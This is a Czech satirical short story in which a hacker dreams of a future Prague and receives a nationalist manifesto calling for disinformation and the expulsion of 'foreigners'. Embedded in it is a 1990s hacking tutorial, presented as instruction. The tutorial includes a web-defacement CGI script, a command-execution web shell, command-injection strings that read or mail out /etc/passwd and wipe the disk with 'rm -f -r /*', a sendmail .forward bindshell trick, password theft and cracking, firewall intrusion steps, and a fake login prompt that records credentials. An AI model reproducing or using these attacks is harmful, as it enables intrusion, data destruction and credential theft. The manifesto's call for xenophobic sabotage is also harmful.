Manifest českého hackera

Manifest českého hackera

Jan Janda

Publikováno s laskavým svolením autora
Zdroj http://sweb.cz/neknihy

Pepíkův krásný sen

Josef Podlaha, známý český hacker se ve tři hodiny ráno probudí, protože jeho speciální skener právě ohlásil nalezenou chybu v PHP skriptu někde ve Finsku. Tuto doménu si velmi oblíbil, protože rychlé severské sítě umožňují jeho skenerům rychlou práci. Vypne tento jednoúčelový skener, který již svoji úlohu splnil a poznamená si IP adresu cílového serveru. Teď spustí klasický Nmap a zkusí skenovat jeho porty. Náhle ho přepadne strašná únava, a také pohled na provolané hodiny jej přinutí odpojit se ze světové pavučiny. Lehne si do postele, usíná a jeho další krásný sen může začít. Přebytek serotoninu v jeho mozku, který je způsoben nadměrným užíváním antidepresiv mu způsobuje příjemné duševní stavy, které vyvolávají níže popsané krásné sny. Pepík pomalu usíná>>>>>>......................................... V jeho snu, který právě začal se píše se rok 2860 a Josef Podlaha jde širokou ulicí, která je plná jásajících lidí všeho druhu. Pepík vidí ve svém snu mnoho černochů, asiatů, indů, rómů, arabů a občas také pochopitelně nějakého Čecha, který stojí někde v davu a radostně přihlíží události, která se právě chystá na historickém území Čech. Konečně se totiž podařilo zvítězit nad lží a nenávistí, a proto takové lidské vlastnosti, jako je xenofobie, rasizmus a nesnášenlivost již neexistují, až na malé výjimky...prostě společnost ve které žije je mírumilovná a nějaké rasové předsudky jsou jí úplně cizí. Svět přeci patří všem a nějaké dělení na "historické území" je přežitkem minulé doby plné válek. Za ruku drží hezkou mulatku, se kterou chodí již dva roky a chtějí se brát...vlastně je to jeho povinností, protože hezká mulatka má již velké břicho. V Evropě v té době žije velmi málo původních obyvatel a většinu z nich tvoří přistěhovalci z Afriky, ale především z jihovýchodní Asie, kde nastal v polovině tisíciletí strašný hladomor, a proto Evropané rozhodli, že se o tyto lidi postarají. Všichni se ovšem přestěhovat nemohli, proto evropská vláda rozhodla, že každý občan Evropy musí posílat minimálně tisíc euro do této oblasti.

Město ve kterém žijí má asi 8 milionů obyvatel a stále se jmenuje Praha. Ale tomu má být zanedlouho konečně konec. Název totiž příliš připomíná minulost tohoto území, což pro další rozvoj není vhodné. Konečně došli ke zřícenině velikého hradu nad bývalou Vltavou, která se teď jmenuje NewKongo. Tady se tlačí desetitisíce lidí, převážně černé pleti a netrpělivě vyhlížejí svoji novou prezidentku. Pepík se svou snoubenkou se protlačí až do první řady, aby lépe viděli tuto historickou událost. Vyndá z tašky kameru a začne natáčet příjezd nové prezidentky. Zatím ovšem její kolona je asi tři kilometry daleko, takže všichni v davu sledují pohyb jejího bezhlučného auta na displeji svých malých osobních počítačů. Pepík má obrazovku přímo na kameře, kde jako ostatní vidí i vzdálenost jejího auta. Když konečně vzdálenost klesne pod tisíc metrů, uvidí její auto i na vlastní oči. Jeho kamera začne automaticky pípat, že může začít natáčení. Josef nasměruje kameru na její auto a uchopí otočný držák, aby kamera automaticky sledovala snímaný objekt. Pak si ovšem uvědomí, že v kameře má málo paměti, a proto rychle zkontroluje sílu signálu. OK! Po naplnění paměti se data začnou automaticky přenášet na jeho domácí počítač, který tvoří střed jeho digitálního světa. Když se kolona přiblíží až před hlavní tribunu, a z auta vystoupí nová černá prezidentka, aby zahájila svůj projev, všichni lidé si nasadí sluchátka a očekávají její historická slova. Nikde žádná ochranka, protože válku s klasickými teroristy se podařilo definitivně vyhrát již v roce 2368. V současnosti probíhá závěrečná fáze boje s digitálními teroristy, kterým se stále říká Hackeři. Jejich síla již pomalu slábne, ale stále jsou aktivní. Celá společnost tyto lidské zrůdy nenávidí. Všichni si ještě pamatují na jejich poslední kousek, kdy místo slavnostního projevu odstupujícího prvního asijského prezidenta, pustili do osobních informačních kanálů jakousi záhadnou píseň s názvem "Kdož sů boží bojovníci", která se údajně zpívala někdy v polovině druhého tisíciletí, které bylo plné strašných válek, kdy kopyta koní se čvachtala v kalužích koňské i lidské krve.

Tentokrát ovšem bezpečnostní experti nic nenechali náhodě. Vytvořili pro tento účel uzavřenou mobilní síť, takže vůbec nevyužívají veřejnou. Každý, kdo vstoupí se svým mobilním počítačem do této zóny, dostane informaci o dalším signálu, který si může naladit, a uslyší tak bezpečně projev nové prezidentky, který právě začal: "Vážení přítomní. Všichni čekáte na nové jméno našeho hlavního města. Tak tady je... bude se jmenovat NewLagos." "Hurá!!! hurá!!! Začala křičet většina přítomných. "Je to na počest mých předků, kteří se narodili v Nigérii." Pokračovala nová prezidentka. V tom se náhle tváře většiny přítomných zachmuřily. V jejich osobních komunikačních kanálech, které již dávno nahradily masové sdělovací prostředky typu rozhlasového a televizního vysílání, se ozval zlověstný hlas, který pravil: "toto území odjakživa patřilo Čechům, slavným potomkům husitů a Jana Žižky z Troc..."v tom okamžiku bylo vysílaní signálu přerušeno a v davu lidí začala chaotická debata...nikdo nic nechápal. Co se vlastně stalo s pamětí světa?

Někdy v roce 2396, se přiblížila k zemi velká planetka, která byla ještě větší než náš měsíc a prolétla v těsné blízkosti planety Země. K žádným viditelným škodám nedošlo, ale bohužel se tím změnila orientace mohutného magnetického pole země, které naší planetu chránilo a ještě stále chrání před slunečním větrem. V té době již většina paměti lidstva byla uložena na digitálních médiích, což se ukázalo jako velká chyba. Narušeným magnetickým polem země začalo pronikat na povrch planety záhadné záření, které způsobilo nefunkčnost všech digitálních systémů. Celou lidskou společnost postihl totální informační chaos. Bylo to něco jako vyhynutí Dinosaurů. Musela být vytvořena nová technologie záznamu a přenosu dat, která ovšem nebyla kompatibilní s tou předcházející. Využila toho skupina politiků, kteří vymazali z paměti většiny evropských národů jejich historii a začali psát novou. Pepík je jednáním hackerů šokován. "O co jim vlastně jde? Vždyť se tady máme jako v ráji! Téměř všechny nemoci se dají léčit, průměrný věk se prodloužil na sto let, nekrade se, nevraždí se, neznásilňuje se, všichni mají práci a kdo pracovat nechce, tak nemusí a stejně se má dobře." Pomyslel si nahlas Pepík. Věděl, že lidsvo ztratilo před mnoha lety paměť. Triliony dat leží na optických médiích, které nejdou přečíst, a právě tam je uložena tajemná historie lidstva, ale i země ve které žije. Ve škole se učili pouze to, co se stalo po přeletu planetky okolo země - všechno předtím je zahaleno tajemstvím, které asi někdo zná. Někomu se tedy podařilo přečíst staré nosiče, a tak zná více než my, obyčejní smrtelníci? Náhle ho posedla vtíravá představa, že tyto informace musí znát.

Druhý den se pokusí navázat kontakt s hackery, kteří již několikrát napadli osobní komunikační kanály, a předávali tak občanům zakázané informace. Kontakt na ně je ovšem velmi složitý, je-li vůbec nějaký. Nikde se fyzicky nescházejí, jsou to pouze virtuální anonymní známosti - divný svět. Už si několikrát na světové pavučině všiml podivného jazyku, ve kterém spolu tito lidé komunikují. Jeho texty jsou plné háčků a čárek a označuje se v počítačovém undergroundu jako čeština. Tímto jazykem se údajně před mnoha sty lety psalo, hovořilo, ale také nadávalo. Ovládá ho již pouze nepatrná hrstka lidí, která spolu tímto jazykem přes internet komunikuje, a tak ho stále udržuje při životě.

I původních českých jmen je v tomto prostoru velmi málo. Pepík Podlaha je jedním z nich, a to mu také pomohlo k navázání kontaktu s umírajícím česko-slovenským undergroundem. V evropštině ho jednou na síti oslovil jakýsi František Novák a vyzval ho, zda-li chce poznat pravdu o zemi ve které žije. Nezaváhal ani vteřinu. Druhý den objeví Pepík ve své osobní schránce přeložený text, který jako by přilétl z jiné planety:

Jsem hacker, a toto je můj boj :

Celá sláva českého národa pramení z jeho válečného umění. Začalo to bitvou u Vogastisburku roku 631. Tehdy sténání a žal zaplavily českou zemi, ale zároveň sebevětší násilí neudusilo vzdor, jenž rostl v srdcích mužů - Avaři v padli do Čech. Jak ale spojit své síly? České kmeny a rody ještě nebyly spjaté v jeden celek. Ale bůh seslal velikého Sama aby sjednotil české kmeny a vyhnal Avary zpět na východ.

Ale i ze západu hrozilo nebezpečí. Na západ od Samovi říše se rozkládala říše Franská. Po Samově smrti se ujali vlády nad Vltavou Přemyslovci. Ale Franská říše byl mocný soused, který si na české území dělal zálusk. Tehdy již nestačilo vyjednávání a Soběslav se chopil meče.

A tak bychom mohli pokračovat ve vítězných bitvách, až do roku 1433, kdy husité byli dokonce u Baltického moře. Tím ovšem sláva českých zbraní končí. Následující rok přijdou Lipany, a pak už je to jenom bída a úpadek, následovaný Bílou horou roku 1620.

To je stará historie českého národa. Druhá, ještě horší, začíná v roce 2004, kdy Česká republika vstoupila do tzv. Evropské unie. To byl začátek zániku české řeči, historie, národního sebevědomí, prostě nezbylo vůbec nic, než tyto řádky, které ti píšu.

My chceme vrátit český národ tam kam patří. K tomu ovšem v dnešním světě nestačí zbraně, ale schopnost pracovat s informacemi. Ten kdo je ovládá, vítězí. Husitské zbraně již nestačí! Proto jsem Hacker a tohle je Můj boj! Chceš se přidat?

Pepík Podlaha si přečetl tato slova a byl uchvácen světem před ztrátou světové paměti. Okamžitě tajemnému Hackerovi odepsal, že se chce přidat ke Svaté české válce.

Druhý den čte toto:

Musíš se stát Hackerem, a tím posílíš řady našich bojovníků. My nejsme vidět, při našem boji neteče žádná krev, ale je stejně účinný. Naším cílem je pronikat do informačních systémů, používat sociální inženýrstvý, dezinformavat, vydávat se za někoho jiného, předávat falešné informace a mnoho dalšího. Tím vytvořit ve společnosti chaos a ve vhodném okamžiku převzít moc a vyhnat cizáky. Bude to těžký boj, ale určitě zvítězíme. Pomáhej nám Bůh!

K tomu, aby jsi pochopil myšlení hackerů, musíme to vzít pěkně od začátku. Jeho historie se začala psát na konci druhého tisíciletí. Z této vzdálené doby se dochovalo několik textů, pozorně si je přečti, možná se ti budou zdát poněkud divné, ale taková byla tehdy doba:

ZÁKLADY HACKINGU NA INTERNETU

TENTO DOKUMENT JE PSÁN V EDITORU VI S PODPOROU ČEŠTINY

1)ČÁST PRVNÍ, ZÁKLADNÍ TECHNIKY.

Jak jsem si všimnul, tak se zde začíná dost odborně hovořit o Internetu.

Tak se také připojím. Vyhlašuji soutěž o jeden milion korun pro toho, kdo

jako první napadne tento WWW server, to je {www.cdrail.cz}. Jinak bych

doporučoval zavést pro nás hackery novou diskusní skupinu, třeba hacker.

A teď malý úvod pro zájemce o milion korun. Je to pochopitelně pouze žert.

Jak jsem si všiml podle souborů s příponou *.asp, tak asi používáte jako

www server produkt firmy Microsoft Internet information server pracujícím

pod Win NT.

Zde jsou možnosti napadení skutečně veliké.

1. Program s názvem WinNuke dokáže dálkově restartovat server běžící pod

win NT. Ovládání programu je ďábelsky jednoduché. Stačí zadat adresu počítače běžící pod win NT. Účinek je rychlý a smrtící. Během několika sekund se Win NT zřítí, veškeré data v paměti RAM jsou zničena a celý počítač se

restartuje. Tyto restarty se opakují stále, pokud nezasáhne administrátor.

Tento problé řeší Service Pack 3. Rychle ho aplikujte.

2. Asi nejznámější chybou v MS IIS je to, že stačí napsat pekelně dlouhé

URL (mezi 4kB až 8kB) a server se zablokuje. To jsou služby www, gopher

a FTP.

3. Jak najít díru v Index serveru ?. Jedna z komponent Hit Counter funguje

opravdu zvláštně. Umožňuje číst soubory, které jinak číst nejdou.

Pokud se jedná o skript ASP, který může obsahovat heslo k serveru SQL

je útočník v půli cesty do průniku do systému. Získat ho lze pomocí

skriptů, které jsou nainstalovány jako příklady:

{jmeno_serveru/samples/search/queryhit.htm}. S omezením vyhledávání

pouze na soubory ASP:"#filename=*.asp".

4. Další tip. Red Buttom je program, který využívá portů 137, 138 a 139 na

počítači s nainstalovanými Win NT. Tento program čte registry, umožňuje

zjistit jména všech zdílených (i skrytých) zdrojů na serveru a vytvoří

nový sdílený zdroj přístupný skupině everyone, tj opravdu kohokoli.

Lze takto získat soubory uložené na lokálním disku včetně šifrovaných

hesel. Další možnosti této utility jsou každému jasné.

5. Jak vytížit CPU na 100% ? Jde o chybu v RPC. Pokud se někdo přihlásí

na server NT telnetem na porty 53, 135 nebo 1031, napíše asi 10 znaků,

stiskne enter a ukončí Telnet, Windows NT najednou začnou mít tolik

"práce", že zatížení CPU stoupne na 100%. Pokud na systému běží i DNS

server, lze napadnout i tuto službu a vyřadit ji z činnosti.

6. Starším předchůdcem chyby v MS Index Serveru je chyba v MS IIS ve spojení

s ASP (active server pages). ASP jsou programy, které interpretuje www

server. Kromě vlastního kódu mohou obsahovat i hesla k serveru SQL apod.

Typická cesta k nějakému souboru ASP je např. {server_name/default}.

Skript na této stránce je interpretován MS IIS a výsledek je předán

vašemu prohlížeči. Pokud toto URL trochu modifikujete, např na

{server_name/default.asp}. (všimněte si tečky na konci!), je místo

toho zobrazen samotný program. Kdokoli ho můze stahnout, přečíst.

No tak to by snad stačilo k Windows NT. Teď se podíváme na UNIX (LINUX).

Tady je situace jednoduchá. Tento stařec již má všechny mouchy vychytané. (Aktuální exploity nepočítám).

Není to jednoduché až téměř nemožné, je-li zde vše dobře nastavené.

Jak dálkově změnit WWW stránku? Je to vůbec možné? Při troše štěstí ano.

Jak tedy na to? Nejprve si vytvoříme svůj hacknutý soubor index.html a

speciální CGI script. V UNIXU bývají v adresáři /home/ftp/incoming/

nastavena přístupová práva na rwxrwxrwx, to je právo zápisu všem.

Do tohoto adresáře pomocí FTP přeneseme tyto dva soubory. To je index.html

a např. hack.cgi. Důležitý je program, který je v cgi scriptu. Tady je:

#!/bin/sh

echo 'Content-Type: text/html'

echo

cp /home/ftp/incoming/index.html /www/htdocs/

Jednoduché že? Ale má to problém, musíme dostat nějakým způsobem tento

cgi script do adresáře kde je povoleno provádění CGI scriptů, nejčastěji

cgi-bin. Toto se nastavuje v souboru httpd.conf direktivou ScriptAlias.

Jinak aby bylo jasno je řeč o WWW serveru Apache, kterých pracuje pod

UNIXEM vetšina. Ten je reprezentován souborem httpd.

Podaří-li se nám dostat tento cgi script do tohoto adresáře, stačí jenom

napsat ve vašem prohlížeči URL k tomuto cgi scriptu a stisknout enter.

Ale to ještě není vše. WWW server musí pracovat jako root. To nastavuje

správce opět v souboru httpd.conf a kořen dokumentů musí být umístněn

v adresáři /www/htdocs/.

Ještě jeden tip. Instalujeme-li server Apache, tak se vytvoří automaticky

adresář cgi-bin, ve kterém je standardně umístněn skript s názvem test-cgi.

Tento skript by měl správce serveru odstranit, protože poskytuje důležité

informace potenciálním útočníkům.

Je-li tento skript přítomen, stačí napsat toto URL:

{jmeno_serveru/cgi-bin/test-cgi}

poté se na obrazovce prohlížeče objeví zajímavé informace o serveru Apache.

Další možností je odhalit bezpečnostní díru v CGI skriptu. Jak na to?

Objeví-li se nám na na řádku např. URL {www.firma.cz/cgi-bin/jmeno.cgi}?

můžeme na konec přidat toto: {www.firma.cz/cgi-bin/jmeno.cgi}?;who

Středník je nebezpečný znak a může způsobit při špatně napsaném cgi skiptu

to, že se provede příkaz zapsaný na konci řádku.V tomto případě příkaz who.

Ale může to být třeba cat /etc/passwd. Platí to i pro PHP.

Dále bych se chtěl ještě zmínit o CGI skriptu, který umužňuje vzdálené

zadávání příkazů operačnímu systému UNIX(LINUX) přes WWW prohlížeč.

Používá značky ISINDEX. Opět tento CGI skript musí být umístněn v odresáři,

kde je povoleno spouštění CGI scriptů. Většinou CGI-BIN.

Zde je je:

#!/bin/sh

echo "Content-type: text/html"

echo

echo ''

echo ''

echo ''

echo '

This is a searchable index. Enter search keywords:

'

$1

Tento CGI script, když se nám ho podaří propašovat nějakým způsobem do adresáře

CGI-BIN a napíšeme k němu ve svém prohlížeči cestu, tak nám nábídne textové

Pole, do kterého můžeme zadávat příkazy. Např. ls; ps; cat, ale třeba i halt

pracuje-li www server Apache jako root. Co tento příkaz způsobí je zřejmé

s jeho názvu.

Jinak, jestli hacker potřebuje zjistit jaký www server používá vzdálený

systém, žádný problém. Použijeme telnet, ale ne ten co je ve Windows 95.

Musíme použít takový, který umožňule přípojování na různé porty. Nejlepší

je samozřejmě interaktivní Telnet z linuxu. Takže se připojíme na port 80:

% telnet 193.179.4.2 80

Poté zadejte

GET / announclist.html HTTP/1.0

Měli by jste dostat odpověď velmi rozsáhlou.

IP adresu jsem si vymyslel, ale je to adresa {www.hrad.cz} (aktualní).

Když jsem u telnetu, tak to je samozřejmě standardní hackerský program.

Lze se připojovat na různé porty a zkoušet zadávat různé textové i netextové

řetězce a pokoušet se proniknout do systému. Nejznámnější je samozřejmě

SMTP server, který pracuje na portu 25, kde naslouchá. Jedná se o program

sendmail spuštěný jako démon. Tento program bývá na některých systémech

kompilován se vzdáleným ladícím přístupem zadáme:

% telnet 193.179.4.2 25

Trying 193.179.4.2 ....

Connected to 193.179.4.2

Escape character is '^]'.

220 192179.4.2 Sendmail 4.1/1.36 ready at Mon, 15 Jun 97 09:51:56

EDT

Pak zadáme příkaz:

debug

Jestliže budete dotázéni na heslo máte naději.

Pomocí elektronické pošty lze internet zahltit. Při psaní emailové

adresy lze přikázat kudy má dopis jít.

Používá se následující formát:

uživatel%{doména1@doména2}

Dopis je dopraven k cílovému poštmistrovi pro doménu "doména2". Ten se podívá

na uživatelskou část a uvidí v ní %. Odtrhne z adresy zavináč a vše za ním,

poslední procento nahradí zavináčem a odešle dopis na vzniklou adresu.

Díku tomuto mechanizmu můžeme diktovat kudy má dopis projít.

Domén můžeme uvést veliké množství. Jestliže se domluví více hackerů a sítí

se přenáší velké objemy dat, např.binární soubory o velikosti asi 500KB

přes obrovské množství serverů, lze celou Internetovou doménu (např.cz),

scela zablokovat na mnoho hodin.

Dále je možné se přihlásit telnetem na port 79 kde pracuje služba finger.

Ta někdy umožňuje vzdálené zadávání tohoto příkazu a tím získávání informací

o uživatelích na systému.

Jinak je zřejmé, že jestliže se vám podáří získat přístup do shelu jako

Root, tak je vše jasné. A jestliže navíc je povoleno přihlášení uživatele

root jak telnetem, tak přes FTP, tak není co řešit, ale taková situace

nastane jenom zřídka.

Zde je seznam služeb standardně spuštěných na systému UNIX (LINUX).

služba port

ftp-data 20

ftp 21

telnet 23

SMTP 25

Whois 43

Gopher 70

Finger 79

http 80

pop-3 110

Na tyto porty je možno se připojovat telnetem a zkoušet.

Hodně práce a času nám ušetří různé hackerské nástroje které jsou dostupné

např.na {www.security.sk} nebo na {www.rootshell.com}

Dále mužeme zkoušet, pracujeme-li na LINUXU tzv. r příkazy, jedná se o

rlogin,rcp,rsh.

Příklad:

%rlogin 193.179.4.2

a uvidíme co se bude dít.

%rcp 193.179.4.2: /etc/passwd /home/

Tímto příkazem se pokoušíme zkopírovat super tajný soubor passwd na svůj

systém.

%rsh 193.179.4.2 ps -aux

Tímto příkazem se snažíme zjistit s jakými oprávněními je spuštěm www server

na vzdáleném systému.

Jenom tak na okraj. Jestliže chcete zjistit IP adresu vzdáleného systému,

stačí použít program ping, např. je i ve win 95:

Příklad:

ping {www.hrad.cz}

Pinging from 193.179.4.2:bytes=32 time 60ms TTL64

Další možnost, jak napadnout vzdálený systém je program tftp napíšem:

$ tftp 193.179.4.2

tftp> get /etc/passwd

Error code 1: File not found

tftp> quit

Jestliže dostaneme podobnou odpověď máme smůlu. Služba je zakázaná.

Vraťme se zpátky k fenoménu dneška, a to je HTTP://WWW. Jak známo, většina

internetových serverů pracuje pod systémem UNIX (LINUX). A ty používají

hlavně www server Apache. Zavádějící historický pokus o zabezpečení

bylo to, že k portům menším než 1024 se smí připojit jen superuživatel root.

Jak známo, tak httpd naslouchá na portu 80. To znamená, že alespoň jednou musí

být server spuštěn jako root. A tady je naše šance. Může se stát, že

administrátor spustí i kopie serveru jako root (nejnovejší verze Apache to

již neumožňuje). A co dál?

WWW server nám pošle formulář v HTML skriptu. Náš počítač formulář

interpretuje a zobrazí ho na obrazovce. My jej vyplníme a poté stiskneme

tlačítko Submit. Náš počítač pak pošle formulář zpět na server, kde se

vyvolá URL, k jehož konci je připojen obsah formuláře. Server je nastaven tak,

aby toto URL spouštělo skript přidávající obsah formuláře do souboru.

Část tohoto skriptu může vypadat takto:

echo "You have sent the following message: $MESSAGE"

Smyslem je, aby nám server poslal potvrzující hlášení, ve kterém se vše, co

jsme napsali, cituje v řetězci $MESSAGE.

Pukud my budeme vychytralý, napíšeme jako obsah $MESSAGE následující text:

'mail 193.179.4.2 /etc/passwd'

Protože zpětné uvozovky jsou interpretem systému UNIX považovány za omezovače

příkazů, může tento text mít natolik alarmující důsledek, jako je odeslání

super tajného hesla k nám.

Nebo chcete-li na serveru úplně vyčistit pevný disk můžeme napsat:

'rm -f -r /*'

Ještě jedna finta, kterou najdte na {www.hysteria.sk} (pajkus). Jedná se o velmi starou fintu se souborem .forward

Jetliže nemáte přístup do shellu ale jenom přes ftp, pak je to přímo

idealní situace pro použití souboru .forward.

Stačí uploadovat soubor.forward do domácího adresáře. Sendmail totiž

standardně umožňuje execování souborů. Vyrobíme nasledující .forvard soubor

$ cat .forward

|/tmp/scriptik

$

Tento soubor je třeba uploadovat do domácího adresáře. Pak si vytvoříme

soubor "scriptik".

$ cat scriptik

/tmp/bindshell &

$

Bindshell je program, který hodí shell na port 31337. Aby se faily mohli

exnout musí být executable. Mužeme to udělat takto:

$ ftp -nv

ftp> o server.provider.cz

Conected to server.provider.cz

ftp> user login heslo

ftp> cd /tmp

ftp> quote site chmod 755 bindshell

ftp> quote site chmod 755 scriptik

ftp> close

Potom stačí na toto konto poslat nějaký mail. Sendmail spustí /tmp/scriptik

a ten spustí bindshell.

Pak se telnetem připojíme na port 31337 např. takto

$ telnet 193.179.4.2 31337

A dostanete se shellu. Pak můžete zadat tento příkaz.

cat /etc/passwd > /home/ftp/incoming/ukradena_hesla

Tímto se obsah tajného souboru passwd přenese do souburu ukradena_hesla

v adresáři incoming.

Pak na soubor passwd pustíme program John the Ripper a máme hesel dostatek.

Možná i účet roota. Ještě se může stát, že anonymní adresář má nastaveny

práva na 777. Pak by to byl čistý vnější průnik.

Konec první části.

Část druhá-Útok na firewall(FW).

Útočná metodologie uvažuje čtyři různé úrovně útoku na FW. První úroveň

spočívá v pokusu o nenápadné získání informací, které mouhou posloužit v další

vlně útoku. Druhá úroveň útoku představuje již patrný bezprostřední sběr

informací, ale ještě ne aktivní pokus o průnik do sítě. Třetí úroveň útoku

se pokouší zdolat FW a narušit za ním lokalizované klienty, přičemž toto

úsilí je inicializováno z klienta vně napadené sítě. Čtvrtá úroveň útoku

pak představuje pokus narušit bezpečnostní software FW, jeho konfiguraci nebo

operační systém s klienta uvnitř atakované sítě.

1)První úroveň útoku

Jde o pokus získat informace o cílové síti, napadení z vnějších zdrojů, tak

aby se o tom cílová organizace nedozvěděla. Prvním krokem je zkontrolovat

vstup do databáse na Network Information Centre (NIC). Použijeme telnet

do rs.internic.net a pak zadáme příkaz whois. To nám poskytne informace

o adresách a lokalitách. Bude nám to také naznačovat složitost cílových

skupin sítě. Jestliže administrativní kontakt je shodný se zónou a

technickým kontaktem, pak to může znamenat, že síťové skupiny mohou být

v Internetu malé a relativně nové. Jestliže cílové organizace nemají svůj

vlastní nameserver, pak je organizace asi malá a relativně krátkou dobu

připojená do Internetu. Příkaz whois vylistuje primární a sekundární

nameservery spolu s doménovým jménem.

Poznámka: (lze použít i www přes {rs.internic.net})

Dalším krokem v této první úrovni je použití příkazu nslookup abychom

získali maximum informací o cílové organizaci. Připojíme se raději k

sekundárnímu nameserveru než k primárnímu a pokuste se o tak zvaný

zóne transfer. Jestliže je zóne transfer povolen, budeme mít velice cenné

informace o vnitřní cílové síti.

Tak lze zjistit počet stanic a topologii cílové sítě. Zóne transwer je však

ve většině sítí zakázán. Příkazem nslookup můžeme zjistit spoustu dalších

informací, např.po použití příkazu set type=MX můžeme zjistit konfiguraci

pošty a IP adresy poštovní serverů atd. Posledním krokem této úrovně je

hledání veřejně přístupných informací o cílové organizaci. Velkým zdrojem

informací mohou být výroční zprávy a obchodní publikace, spojení s jinými

organizacemi atd. Tyto informace mohou být užitečné, ze kterých kanálů

útočit.

2)Druhá úroveň útoku

Sondování již může být objeveno cílovou organizací. Prvním krokem je pokus

přenos DNS zóny z primárního name serveru, ačkoli většina organizací přenos

zóny zakazuje, jak bylo řečeno výše. Ten kdo na FW útočí musí v dalším

kroku vyhledat sítě a v nich konkrétní uzly. Zabere to hodně času, zvlášť

pokud je síť za FW rozhlehlá. Tento krok lze i při nedostatku času přeskočit

Pro vyhledávání existují dvě metody.

PING

POKUS PŘIPOJIT SE NA TCP PORT 25

Směrovače mohou ztratit ICMP pakety, proto je žádoucí abychom posílali

nejméně tři pakety na každou adresu. Osobně doporučuji pět paketů.

Připojení na TCP port je pomalejší, protože spojení čeká na time-out

jestliže je adresa nedostupná. Každý uzel, který odpoví,je pak potenciálním

bodem vstupu do vnitřní sítě.Tímto způsobem si vytvoříme seznam

potenciálních uzlů (cílů) a měli bychom zjistit, jaké služby na nich běží.

Předpokládá to uskutečnění připojení na každý TCP port na každé cílové

stanici.

3)Třetí úroveň útok a proniknutí.

Tato metodologie předpokládá, že v tomto okamžiku máme k dispozici seznam

uzlů a služeb vnitřní sítě z FW, teprve potom můžeme zahájit útok.

Existují dva druhy útoků:

a) získání přístupu do shellu FW (dokonce se můžeme stát správci systému),

b) použití vzdálených služeb, které jsou k dispozici prostřednictvým FW a

které změní kritické konfigurační soubory nebo modifikují služby, které

běží na FW.

Na FW často běží služba (např.mail démon), která není dostatečně zabezpečená

Tyto služby se stanou prvním cílem útoku. Mnoho FW má slabinuv syslogd, jiné

dovolují spojení telnetem z adres IP externích sítí. Ještě lepší je, když

na FW je velký počet neaktivních účtů, které měli být dávno vymazány.

Dokonce i když je FW odolný proti proniknutí z externích lokalit, vnitřní

uzly a uzly v demilitarizované zóně (DMZ)jsou často přístupné z vnější

sítě. Už takto kvalifikované útoky mohou způsobit nefunkčnost napadené

sítě. A to nám přeci jde. Po té, co jsme uskutečnili veškeré útoky proti FW, je

nutno obrátit pozornost na uzly v cílové síti. Zkusíme telnet popř. rlogin a

posíme se získat přístup do shellu. Další možností získání přístupu

je využít slabiny v NFS, NIS a sendmailu. Velkou službu nám udělají

hackerské nástroje, které jsou dostupné na mnoha FTP serverech (ale nejsou nutné). Proniknutí do jednoho uzlu interní sítě akceleruje proces proniknutí do celé vnitřní

sítě. Je tomu tak proto, že uzly v TCP/IP nemají mezi sebou zabezpečené

vztahy.

4)Modifikace FW

Jde o napadení FW s cílem modifikovat FW, povolit volný přístup a jednoduchý

přístup do vnitřní sítě. Nainstalujeme program "sniffer" do segmentu sítě,

kde je FW, který čeká na přihlášení administrátora.

Některé hackerské programy: SATAN-program pro pátrání po bezpečnostních

chybách ve www serverech.

CRACK-louskač hesel.

ROOTKIT-Nástroj pro privilegovaný přístup do systému UNIX (LINUX).

TAP-Analyzuje packety.

WINNUKE-Dálkově resetuje www servery pod Win NT.

Ještě nakonec této části uvádím hackerské www servery, kde lze získat různé

hackerské utility.

Hackerské adresy:

{www.digicrime.com}

{fishwrap.mit.edu/Hacks/misc/gallery_menu.html}

{nmrc.org/}

{jya.com/mondex-hack.htm}

{www.stanford.edu/}~llurch/

čipové karty {www.ioc.ee/atsc/}

Hackerský časopis: {www.klaphek.nl}

Chyba v exploreru: {www.cybersnot.com/iebug.html/}

čipové karty: {www.ft.uni-erlagen.de/}~mskuhn/tamper/html

Telnet://rs.internic.net (příkaz WHOIS)

čipové karty: {www.bellcore.com/SMART/index.html}

čipové karty: {www.cs.technion.ac.il/}~biham/

hackerské nástroje:{www.security.sk} nebo {www.rootshell.com}

Slovenský server {www.hysteria.sk} nebo {hack.box.sk}

el.časopis phrack:{www.fc.net/phrack/}

{www.phrack.com/}

{www.2600.com/hacked_pages}

Satelit {www.hack.sk}

ČÁST TŘETÍ aneb technologie a postupy největšího hakera všech dob Němce

Markuse Hesse.

Psal se rok 1988 když Makrkus Hess pronikal do Milnetu (předchudce Internetu)

a kradl s tamních UNIXů informace a prodával je za tisíce marek KGB. Netušil, že ho sledují, dokonce tak dokonake, že monitorovali každý jeho úder na

klávesnici.

V této době jěště systém UNIX měl tolik chyb, že to pro odborníka jeho

kalibru nebyl problém. Pro průniky používal terminálového klienta, který

podporoval protokol Telnet. Z Německa se přes družicové spoje připojoval

na vojenské počítače se systémem UNIX. Zde se dostával do systému pomocí

různých vyhrazených hesel jako např. SYSTEM, MANAGER, FIELID, SERVICE, USER

aj. Nebo dokonce systém hesla vůbec nepoužíval.

Pak pomocí specialního programu kterým nahradil program atrun v UNIXU.

Progran atrun je specialní program, který se spouští každých 5 minut

a provádí kontrulu celého systému. Tento program pracuje s nejvyšší

prioritou. A právě tento program nahradil svým vlastním programem, který

se za 5 minut spustil a způsobil to, že se z obyčejného uživatele se stal

superuživatel. K tomu aby mohl jako běžný uživatel zkopírovat tento svůj

program do systémové oblasti, kam normálně nemůže, využil chyby v editoru

GNU-emacs. Tento editor totiž umožňuje i běžnému uživately kopírovat

do systémových oblastí, kam by to normálním uživatelům jít nemělo.

Stejně ho ale chytli při činu.

Příklad programu, který používal ke kradení hesel:

echo -n "Vítejte v počítači LBL UNIX-4"

echo -n "Prosím přihlašte se"

echo -n "LOGIN:"

read account name

echo -n "Uveďte své přístupové heslo:"

(stty -echo;\

read password;\

stty -echo;\

echo $account_name $password >> /tmp/ .pub)

echo "Lituji, zkuste to znovu."

..........<<<<<<<<<<<<< Pepík se probouzí ze snu......náhle s sebou prudce trhne a udeří rukou do stěny. Probudil se. Divný sen pomyslí si. Ty Základy hackingu jsem přeci kdysi psal já. Začínám z toho hackování blbnout. V takovém světě bych chtěl žít - bez rasizmu, xenofóbie, nenávisti, nesnášenlivosti...ach to by byl krásný svět.

Jak se pepík hackerem stal

